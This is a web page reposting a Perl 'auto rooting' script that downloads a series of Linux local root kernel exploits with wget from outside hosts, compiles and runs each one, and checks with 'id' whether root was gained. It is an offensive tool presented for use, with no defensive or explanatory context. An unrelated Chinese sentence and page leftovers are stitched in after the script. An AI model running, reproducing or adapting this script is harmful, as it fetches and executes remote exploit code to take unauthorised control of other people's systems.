Auto Rooting Linux > Local Roots For 2007 / 2008 / 20

#!/bin/perl # Auto Rooting Linux # By xp # Local root 2007 2008 2009 for Linux Priv8 # Usage: perl autoroot.pl # Version: 1.0 !!! # Note : gcc & wget Command must Be Enabled .# {  system("uname -a"); system("wget www.tux-planet.fr/public/hack/exploits/kernel/sock-sendpage-local-root-exploit.tar.gz");    system("tar zxvf sock-sendpage-local-root-exploit.tar.gz");  system("cd sock-sendpage-local-root-exploit");  system("chmod 755 wunderbar_emporium.sh"); system("sh wunderbar_emporium.sh"); system("id"); system("cat /proc/sys/vm/mmap_min_addr"); print "Please Wait ..."; system("wget www.tux-planet.fr/public/hack/exploits/kernel/local-root-exploit-gayros.c"); system("gcc -o gayros local-root-exploit-gayros.c"); system("chmod 777 gayros"); system("./gayros"); system("id"); system("wget www.tux-planet.fr/public/hack/exploits/kernel/vmsplice-local-root-exploit.c"); system("gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c"); system("chmod 777 vmsplice-local-root-exploit"); system("./vmsplice-local-root-exploit"); system("id"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x2"); system("chmod 777 x2"); system("./x2"); system("id"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x"); system("chmod 777 x"); system("./x"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/uselib24"); system("chmod 777 uselib24"); system("./uselib24"); system("id"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/root2"); system("chmod 777 root2"); system("id"); system("./root2"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/kmod2"); system("chmod 777 kmod2"); system("./kmod2"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/h00lyshit"); system("chmod 777 h00lyshit"); system("./h00lyshit"); system("id"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/exp.sh"); system("chmod 755 exp.sh"); system("sh exp.sh"); system("id"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/elflbl"); system("chmod 777 elflbl"); system("./elflbl"); system("id"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/cw7.3"); system("chmod 777 cw7.3"); system("./cw7.3"); system("id"); system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.4.x/newlocal"); system("chmod 777 newlocal"); system("./newlocal"); system("id"); system("uname -a"); system("id;pwd"); print "XP";   print "[ w7s7[at]hotmail[dot]com ]";  print "[ XP10.me ]";  

是会眨眼的星星,而当火车弯曲而行,这些星群便上上下下的画着弧线,

Auto Rooting Linux > Local Roots For 2007 / 2008 / 20

相关文章:

你感兴趣的文章:

标签云: